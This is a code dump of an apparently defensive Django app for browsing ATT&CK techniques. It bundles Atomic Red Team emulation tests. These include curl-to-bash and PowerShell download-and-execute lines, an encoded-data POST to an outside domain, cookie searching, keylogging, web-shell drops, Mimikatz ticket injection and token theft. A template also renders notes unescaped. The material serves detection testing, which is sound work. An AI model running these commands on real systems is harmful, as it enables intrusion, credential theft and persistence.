--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/urls.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/views.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/views.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
class MatrixConfig(AppConfig):
    """App-registry configuration for the ``matrix`` Django app."""

    # Must match the app's package name so Django can locate its models,
    # templates and templatetags.
    name = 'matrix'
6 |
--------------------------------------------------------------------------------
/elemental/matrix/forms.py:
--------------------------------------------------------------------------------
1 | from django.core.exceptions import ValidationError
2 | from django.utils.translation import ugettext_lazy as _
3 | import datetime # for checking renewal date range.
4 | from matrix.models import Technique, Note
5 | from django import forms
6 |
class noteForm(forms.ModelForm):
    """ModelForm for creating or editing a ``Note`` attached to a technique.

    Only ``technique``, ``note`` and ``date`` are exposed as form fields.
    """

    class Meta:
        model = Note
        # Explicit allow-list rather than ``'__all__'``: a column added to
        # Note later never silently becomes user-editable through this form.
        fields = ('technique', 'note', 'date')
11 |
12 |
13 |
--------------------------------------------------------------------------------
/elemental/matrix/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/migrations/__init__.py
--------------------------------------------------------------------------------
/elemental/matrix/migrations/__pycache__/0001_initial.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/migrations/__pycache__/0001_initial.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/migrations/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/migrations/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/static/matrix/elemental.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/static/matrix/elemental.png
--------------------------------------------------------------------------------
/elemental/matrix/static/matrix/style.css:
--------------------------------------------------------------------------------
/* Vertical list used for navigation: no bullets, flush left, pushed down 20px. */
.sidebar-nav {
    list-style: none;
    padding: 0;
    margin-top: 20px;
}

/* Fixed-width panel; presumably for code/rule text given the name — confirm in templates. */
.coder {
    background-color: gray;
    color: blueviolet;
    width: 800px;
}

/* Anchors inside list items. */
li a {
    color: blue;
}
--------------------------------------------------------------------------------
/elemental/matrix/templates/elemental.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/templates/elemental.png
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/TacticTemplate.html:
--------------------------------------------------------------------------------
{# Lists every tactic (name + description) inside base_generic.html's content block. #}
{% extends "base_generic.html" %}

{% block content %}

Tactic List On the MODEL TEMPLATE CLASS
{# NOTE(review): the context key `tatic_list` looks like a typo of `tactic_list`; confirm against the view that renders this template — if the view passes `tactic_list`, this template always falls through to the "no Tactics" branch. #}
{% if tatic_list %}

{% for tactic in tatic_list %}
-
{{ tactic.tactic_name }} ({{tactic.tactic_description}})

{% endfor %}

{% else %}
There are no Tactics.
{% endif %}
{% endblock %}
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/addSigma.html:
--------------------------------------------------------------------------------
{# Page shell for adding a Sigma rule; loads the short_name tag library and sets the title to "Elemental". #}
{% extends "base_generic.html" %}


{% load short_name %}

{% block title %}Elemental{% endblock %}

{% block content %}
{# NOTE(review): the content block is empty in this listing — either the upload form has not been written yet or its markup was lost in extraction; confirm against the source file. A POST form here needs {% csrf_token %}. #}



{% endblock %}

--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/addnote.html:
--------------------------------------------------------------------------------
{# Shows the technique id and every existing note for it; the note-entry form (source lines 14-19) is not visible in this listing — if it POSTs, confirm it carries {% csrf_token %}. #}
{% extends "base_generic.html" %}
{% block content %}


Enter Notes for the Technique


{{ technique_id }}

{# |safe turns off Django's autoescaping, so any HTML or script stored in a note is emitted verbatim. NOTE(review): notes look like free text entered through noteForm (forms.py) — confirm the view sanitizes them before storage; otherwise this is a stored-XSS sink and |safe should be removed. #}
{% for note in tech_notes %}
{{ note | safe }}
{% endfor %}



{% endblock %}




--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/atomic.html:
--------------------------------------------------------------------------------
{# Renders a single atomic test page inside base_generic.html's content block. #}
{% extends "base_generic.html" %}

{% block content %}

{# |safe disables autoescaping, so `atom` is treated as trusted markup. Presumably the view renders one of the media/atomics/*.md files to HTML — verify the source; anything user-supplied must be escaped or sanitized before it reaches this variable. #}
{{ atom | safe }}

{% endblock %}


--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/noteForm.html:
--------------------------------------------------------------------------------
{# Headerless page hosting the note form. The form markup (source lines 6-15) is not visible in this listing — confirm it includes {% csrf_token %} if it POSTs. #}
{% extends "base_generic_no_header.html" %}

{% block content %}


{% endblock %}
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/note_detail.html:
--------------------------------------------------------------------------------
{# Headerless detail view of one Note: its text, date, owning technique, and an "Edit Note" action (link markup not visible in this listing). #}
{% extends "base_generic_no_header.html" %}

{% block content %}

{# `note` and `note.date` are autoescaped here (no |safe), unlike the list in addnote.html. #}
Note: {{ note }}
{{note.date}}



Technique Note for: {{note.technique}}


Edit Note




{% endblock %}

--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/note_form.html:
--------------------------------------------------------------------------------
{# Headerless create/update page for Note (Django's default <model>_form.html name). The form markup (source lines 6-15) is not visible in this listing — confirm it includes {% csrf_token %} if it POSTs. #}
{% extends "base_generic_no_header.html" %}

{% block content %}


{% endblock %}
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/tactic_detail.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic.html" %}
2 |
3 | {% block content %}
4 |
5 | Tactic Title: {{ tactic.tactic_name }} {# no |safe here: assuming base_generic.html does not turn autoescape off, HTML in the tactic fields is escaped on output — keep it that way if these fields ever become user-editable #}
6 |
7 | Summary: {{ tactic.tactic_description }}
8 |
9 | {% endblock %}
10 |
11 |
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/tactic_list.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic.html" %}
2 |
3 | {% block content %}
4 | Tactic List FROM THE TACTIC_LIST HEML PAGEEE
5 | {% if total_tactics %}
6 |
22 | {% else %}
23 | There are no Tactics for this mother.
24 | {% endif %}
25 | {% endblock %}
--------------------------------------------------------------------------------
/elemental/matrix/templatetags/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/templatetags/__init__.py
--------------------------------------------------------------------------------
/elemental/matrix/templatetags/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/templatetags/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/templatetags/__pycache__/short_name.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/templatetags/__pycache__/short_name.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/templatetags/short_name.py:
--------------------------------------------------------------------------------
1 | from django import template
2 |
3 | register = template.Library()  # filter registry; presumably loaded in templates with {% load short_name %} (module name under templatetags/) — verify against the templates
4 |
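@register.filter
def short_name(value):
    """Template filter: turn a display name into a dashed, lower-case token.

    Every space in ``value`` becomes ``-`` and the result is lower-cased,
    e.g. ``"Defense Evasion"`` -> ``"defense-evasion"``.  Only spaces are
    touched; every other character (``/``, quotes, ``<`` ...) passes through
    unchanged.  The filter is not registered with ``is_safe``, so its output
    is still subject to the template engine's autoescaping.

    Args:
        value: the template variable.  Non-``str`` values (``None``, ints,
            lazy strings) are coerced with ``str()`` — the same contract as
            Django's ``stringfilter`` — instead of raising ``AttributeError``
            and failing the whole page render.

    Returns:
        str: the dashed, lower-cased text.
    """
    # str() first: a None or integer model attribute must not 500 the page.
    return str(value).replace(" ", "-").lower()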
8 |
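@register.filter
def rem_slash(value):
    """Template filter: insert a space after every ``/``.

    ``"a/b/c"`` becomes ``"a/ b/ c"``.  Despite the name no slash is removed;
    the inserted spaces presumably give the browser word-break opportunities
    so long slash-separated names can wrap instead of overflowing a cell.
    The filter is not registered with ``is_safe``, so the result is still
    autoescaped on output.

    Args:
        value: the template variable.  Non-``str`` values are coerced with
            ``str()`` (as Django's ``stringfilter`` does) rather than raising
            ``AttributeError`` during rendering.

    Returns:
        str: ``value`` with ``"/ "`` in place of each ``"/"``.
    """
    # str() first so a non-string attribute cannot break the page render.
    return str(value).replace("/", "/ ")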
12 |
--------------------------------------------------------------------------------
/elemental/matrix/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1005.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1005
3 | display_name: Data from Local System
4 |
5 | atomic_tests:
6 | - name: Search macOS Safari Cookies
7 | description: |
8 | This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | input_arguments:
14 | search_string:
15 | description: String to search Safari cookies to find.
16 | type: string
17 | default: coinbase
18 |
19 | executor:
20 | name: sh
21 | elevation_required: false
22 | command: |
23 | cd ~/Library/Cookies
24 | grep -q "#{search_string}" "Cookies.binarycookies"
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1009.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1009
3 | display_name: Binary Padding
4 |
5 | atomic_tests:
6 | - name: Pad Binary to Change Hash - Linux/macOS dd
7 | description: |
8 | Uses dd to add a zero to the binary to change the hash
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 | input_arguments:
14 | file_to_pad:
15 | description: Path of binary to be padded
16 | type: Path
17 | default: /tmp/evil-binary
18 | executor:
19 | name: sh
20 | elevation_required: false
21 | command: |
22 | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1010.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1010
3 | display_name: Application Window Discovery
4 |
5 | atomic_tests:
6 | - name: List Process Main Windows - C# .NET
7 | description: |
8 | Compiles and executes C# code to list main window titles associated with each process.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_source_code:
15 | description: Path to source of C# code
16 | type: path
17 | default: PathToAtomicsFolder\T1010\src\T1010.cs
18 | output_file_name:
19 | description: Name of output binary
20 | type: string
21 | default: T1010.exe
22 |
23 | executor:
24 | name: command_prompt
25 | elevation_required: false
26 | command: |
27 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
28 | #{output_file_name}
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1030.md:
--------------------------------------------------------------------------------
1 | # T1030 - Data Transfer Size Limits
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
3 | An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
4 |
5 | ## Atomic Tests
6 |
7 | - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)
8 |
9 |
10 |
11 |
12 | ## Atomic Test #1 - Data Transfer Size Limits
13 | Create a 25 MB file of random data in /tmp and split it into 5 MB (5,000,000-byte) chunks, mimicking chunked exfiltration; the chunks and the source file are left in /tmp (there is no cleanup step).
14 |
15 | **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
16 |
17 |
18 | #### Run it with `sh`!
19 | ```
20 | cd /tmp/
21 | dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
22 | split -b 5000000 /tmp/victim-whole-file
23 | ls -l
24 | ```
25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1030.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1030
3 | display_name: Data Transfer Size Limits
4 |
5 | atomic_tests:
6 | - name: Data Transfer Size Limits
7 | description: |
8 | Create a 25 MB file of random data in /tmp and split it into 5 MB (5,000,000-byte) chunks, mimicking chunked exfiltration; the chunks and the source file are left in /tmp (there is no cleanup_command).
9 |
10 | supported_platforms:
11 | - macos
12 | - centos
13 | - ubuntu
14 | - linux
15 |
16 | executor:
17 | name: sh
18 | elevation_required: false
19 | command: |
20 | cd /tmp/
21 | dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
22 | split -b 5000000 /tmp/victim-whole-file
23 | ls -l
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1031.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1031
3 | display_name: Modify Existing Service
4 |
5 | atomic_tests:
6 | - name: Modify Fax service to run PowerShell
7 | description: |
8 | This test will temporarily modify the service Fax by changing the binPath to PowerShell
9 | and will then revert the binPath change, restoring Fax to its original state.
10 |
11 | supported_platforms:
12 | - windows
13 |
14 | executor:
15 | name: command_prompt
16 | elevation_required: true
17 | command: |
18 | sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
19 | sc start Fax
20 | cleanup_command:
21 | sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
22 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1038.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1038
3 | display_name: DLL Search Order Hijacking
4 |
5 | atomic_tests:
6 | - name: DLL Search Order Hijacking - amsi.dll
7 | description: |
8 | Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version
9 | of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface). Note that this test copies the system's own amsi.dll next to the renamed powershell.exe, so it exercises the search-order load path rather than an actual bypass, and it leaves updater.exe and amsi.dll in %APPDATA% (there is no cleanup_command).
10 | https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor:
16 | name: command_prompt
17 | elevation_required: false
18 | command: |
19 | copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
20 | copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
21 | cmd.exe /k %APPDATA%\updater.exe
22 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1042.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1042
3 | display_name: Change Default File Association
4 |
5 | atomic_tests:
6 | - name: Change Default File Association
7 | description: |
8 | Change the default file association for an extension from cmd.exe using assoc. There is no cleanup_command, so the association (by default .wav) stays pointed at the target handler until reverted manually; assoc changes the machine-wide class registration, so it may fail without elevation despite elevation_required being false — verify on the target build.
9 |
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | extension_to_change:
14 | description: File Extension To Hijack
15 | type: String
16 | default: .wav
17 | target_exenstion_handler:
18 | description: Thing To Open
19 | type: Path
20 | default: C:\Program Files\Windows Media Player\wmplayer.exe
21 | executor:
22 | name: command_prompt
23 | elevation_required: false
24 | command: |
25 | cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
26 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1056.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1056
3 | display_name: Input Capture
4 |
5 | atomic_tests:
6 | - name: Input Capture
7 | description: |
8 | Utilize PowerShell and external resource to capture keystrokes
9 | [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1)
10 | Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | filepath:
17 | description: Name of the local file, include path.
18 | type: Path
19 | default: c:\key.log
20 |
21 | executor:
22 | name: powershell
23 | command: |
24 | $PathToAtomicsFolder\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1057.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1057
3 | display_name: Process Discovery
4 |
5 | atomic_tests:
6 | - name: Process Discovery - ps
7 | description: |
8 | Utilize ps to identify processes
9 |
10 | supported_platforms:
11 | - macos
12 | - centos
13 | - ubuntu
14 | - linux
15 |
16 | input_arguments:
17 | output_file:
18 | description: path of output file
19 | type: path
20 | default: /tmp/loot.txt
21 |
22 | executor:
23 | name: sh
24 | elevation_required: false
25 | command: |
26 | ps >> #{output_file}
27 | ps aux >> #{output_file}
28 |
29 | - name: Process Discovery - tasklist
30 | description: |
31 | Utilize tasklist to identify processes
32 |
33 | supported_platforms:
34 | - windows
35 |
36 | executor:
37 | name: command_prompt
38 | elevation_required: false
39 | command: |
40 | tasklist
41 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1058.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1058
3 | display_name: Service Registry Permissions Weakness
4 |
5 | atomic_tests:
6 | - name: Service Registry Permissions Weakness
7 | description: |
8 | Checks the ACLs on service registry keys for weak permissions: a key writable by a low-privileged user lets that user change the service's ImagePath and escalate privileges. The executor below only reads the ACLs; the reg add line that follows is illustrative and is not run, e.g.
9 | reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
10 |
11 | supported_platforms:
12 | - windows
13 |
14 | input_arguments:
15 | weak_service_name:
16 | description: weak service check
17 | type: Registry
18 | default: weakservicename
19 |
20 | executor:
21 | name: powershell
22 | elevation_required: false
23 | command: |
24 | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
25 | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
26 |
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1059.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1059
3 | display_name: Command-Line Interface
4 |
5 | atomic_tests:
6 | - name: Command-Line Interface
7 | description: |
8 | Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
9 |
10 | This will download the specified payload and set a marker file in `/tmp/art-fish.txt`. Both commands execute whatever the remote URL serves at run time, so the test depends on network access and on the upstream repository's content. Note that the second (wget) command's URL path uses `Atomics/` where the first uses `atomics/`; raw GitHub paths are case-sensitive, so confirm the URL before relying on that line.
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor:
19 | name: sh
20 | command: |
21 | bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
22 | bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1073.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1073
3 | display_name: DLL Side-Loading
4 |
5 | atomic_tests:
6 | - name: DLL Side-Loading using the Notepad++ GUP.exe binary
7 | description: |
8 | GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | process_name:
15 | description: Name of the created process
16 | type: string
17 | default: calculator.exe
18 |
19 | executor:
20 | name: command_prompt
21 | elevation_required: false
22 | command: |
23 | $PathToAtomicsFolder\T1073\bin\GUP.exe
24 | cleanup_command: |
25 | taskkill /F /IM #{process_name}
--------------------------------------------------------------------------------
/elemental/media/atomics/T1097.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1097
3 | display_name: Pass the Ticket
4 |
5 | atomic_tests:
6 | - name: Mimikatz Kerberos Ticket Attack
7 | description: |
8 | Similar to pass-the-hash, but injecting a Kerberos ticket. The command below is shown as typed at the interactive `mimikatz #` prompt, so it cannot be executed directly by command_prompt: mimikatz must already be present and launched on the host, and the user/domain placeholders are illustrative rather than a complete ptt invocation.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | user_name:
15 | description: username
16 | type: string
17 | default: Administrator
18 | domain:
19 | description: domain
20 | type: string
21 | default: atomic.local
22 |
23 | executor:
24 | name: command_prompt
25 | command: |
26 | mimikatz # kerberos::ptt #{user_name}@#{domain}
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1100.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1100
3 | display_name: Web Shell
4 |
5 | atomic_tests:
6 | - name: Web Shell Written to Disk
7 | description: |
8 | This test simulates an adversary deploying web shells by copying shell files to disk. Caution: the default drops the shells into the live IIS webroot (C:\inetpub\wwwroot) and there is no cleanup_command, so on a host running IIS the copied shells are remotely reachable until removed — delete them as soon as the detection has fired.
9 | Idea from APTSimulator.
10 | cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
11 |
12 | supported_platforms:
13 | - windows
14 | input_arguments:
15 | web_shell_path:
16 | description: The path to drop the web shell
17 | type: string
18 | default: C:\inetpub\wwwroot
19 | web_shells:
20 | description: Path of Web Shell
21 | type: path
22 | default: PathToAtomicsFolder\T1100\shells\
23 | executor:
24 | name: command_prompt
25 | command: |
26 | xcopy #{web_shells} #{web_shell_path}
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1103.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1103
3 | display_name: AppInit DLLs
4 |
5 | atomic_tests:
6 | - name: Install AppInit Shim
7 | description: |
8 | AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. This test sets it by importing a .reg file; there is no cleanup_command, so the registration persists and keeps being applied to new processes until the registry change is reverted.
9 |
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | registry_file:
14 | description: Windows Registry File
15 | type: Path
16 | default: T1103.reg
17 |
18 | executor:
19 | name: command_prompt
20 | elevation_required: true
21 | command: |
22 | reg.exe import #{registry_file}
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1114.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1114
3 | display_name: Email Collection
4 | attack_link: https://attack.mitre.org/wiki/Technique/T1114
5 |
6 | atomic_tests:
7 | - name: T1114 Email Collection with PowerShell
8 |
9 | description: |
10 | Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor:
16 | name: command_prompt
17 | elevation_required: false
18 | command: |
19 | Display email contents in the terminal
20 | PS C:\> .\Get-Inbox.ps1
21 |
22 | Write emails out to a CSV
23 | PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
24 |
25 | Download and Execute
26 | "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114/Get-Inbox.ps1')"
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1115.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1115
3 | display_name: Clipboard Data
4 | attack_link: https://attack.mitre.org/wiki/Technique/T1115
5 |
6 | atomic_tests:
7 | - name: Utilize Clipboard to store or execute commands from
8 | description: |
9 | Add data to clipboard to copy off or execute commands from.
10 | supported_platforms:
11 | - windows
12 | executor:
13 | name: command_prompt
14 | elevation_required: false
15 | command: |
16 | dir | clip
17 | clip < readme.txt
18 |
19 | - name: PowerShell
20 | description: |
21 | Utilize PowerShell to echo a command to clipboard and execute it
22 | supported_platforms:
23 | - windows
24 | executor:
25 | name: powershell
26 | elevation_required: false
27 | command: |
28 | echo Get-Process | clip
29 | Get-Clipboard | iex
30 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1122.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1122
3 | display_name: Component Object Model Hijacking
4 |
5 | atomic_tests:
6 | - name: Component Object Model Hijacking
7 | description: |
8 | Hijack COM Object used by certutil.exe
9 |
10 | supported_platforms:
11 | - windows
12 | executor:
13 | name: command_prompt
14 | command: |
15 | reg import PathToAtomicsFolder\T1122\src\COMHijack.reg
16 | certutil.exe -CAInfo
17 | cleanup_command: |
18 | reg import PathToAtomicsFolder\T1122\src\COMHijackCleanup.reg
19 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1124.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1124
3 | display_name: System Time Discovery
4 |
5 | atomic_tests:
6 | - name: System Time Discovery
7 | description: |
8 | Identify the system time
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | computer_name:
15 | description: computer name to query
16 | type: string
17 | default: localhost
18 |
19 | executor:
20 | name: command_prompt
21 | elevation_required: false
22 | command: |
23 | net time \\#{computer_name}
24 | w32tm /tz
25 |
26 | - name: System Time Discovery - PowerShell
27 | description: |
28 | Identify the system time via PowerShell
29 |
30 | supported_platforms:
31 | - windows
32 |
33 | executor:
34 | name: powershell
35 | elevation_required: false
36 | command: |
37 | Get-Date
38 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1127.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1127
3 | display_name: Trusted Developer Utilities
4 | atomic_tests:
5 | - name: MSBuild Bypass Using Inline Tasks
6 | description: |
7 | Executes the code in a project file using. C# Example
8 | supported_platforms:
9 | - windows
10 | input_arguments:
11 | filename:
12 | description: Location of the project file
13 | type: Path
14 | default: T1127.csproj
15 | executor:
16 | name: command_prompt
17 | elevation_required: false
18 | command: |
19 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
20 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1128.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1128
3 | display_name: Netsh Helper DLL
4 |
5 | atomic_tests:
6 | - name: Netsh Helper DLL Registration
7 | description: |
8 | Netsh interacts with other operating system components using dynamic-link library (DLL) files. This test registers #{helper_file} as a netsh helper; the registration persists and the DLL is loaded on every subsequent netsh run, and there is no cleanup_command, so remove the helper afterwards. The default C:\Path\file.dll is a placeholder and must point to a real DLL.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | helper_file:
15 | description: Path to DLL
16 | type: Path
17 | default: C:\Path\file.dll
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | netsh.exe add helper #{helper_file}
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1132.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1132
3 | display_name: Data Encoding
4 |
5 | atomic_tests:
6 | - name: Base64 Encoded data.
7 | description: |
8 | Utilizing a common technique for posting base64 encoded data. The encoded value is placed in the host name of the request (#{base64_data}.#{destination_url}), so it is exposed through the DNS lookup as well as the HTTP POST; note that the "=" padding in the default value is not a valid host-name character, so name resolution may fail — adjust the value or destination when running.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | input_arguments:
15 | destination_url:
16 | description: Destination URL to post encoded data.
17 | type: string
18 | default: redcanary.com
19 | base64_data:
20 | description: Encoded data to post using fake Social Security number 111-11-1111.
21 | type: string
22 | default: MTExLTExLTExMTE=
23 |
24 | executor:
25 | name: sh
26 | command: |
27 | echo -n 111-11-1111 | base64
28 | curl -XPOST #{base64_data}.#{destination_url}
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1134.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1134
3 | display_name: Access Token Manipulation
4 |
5 | atomic_tests:
6 | - name: Access Token Manipulation
7 | description: |
8 | Creates a process as another user
9 | Requires Administrator Privileges To Execute Test. The final line dot-sources .\src\T1134.ps1 relative to the current directory, unlike other tests that use $PathToAtomicsFolder, so run it from the T1134 atomics folder (or fix the path) or the token-stealing step fails to load.
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | target_user:
14 | description: Username To Steal Token From
15 | type: String
16 | default: SYSTEM
17 | executor:
18 | name: powershell
19 | elevation_required: true
20 | command: |
21 | #list processes by user,
22 |
23 | $owners = @{}
24 | gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
25 | get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
26 | #Steal Token
27 | . .\src\T1134.ps1
28 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1139.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1139
3 | display_name: Bash History
4 |
5 | atomic_tests:
6 | - name: Search Through Bash History
7 | description: |
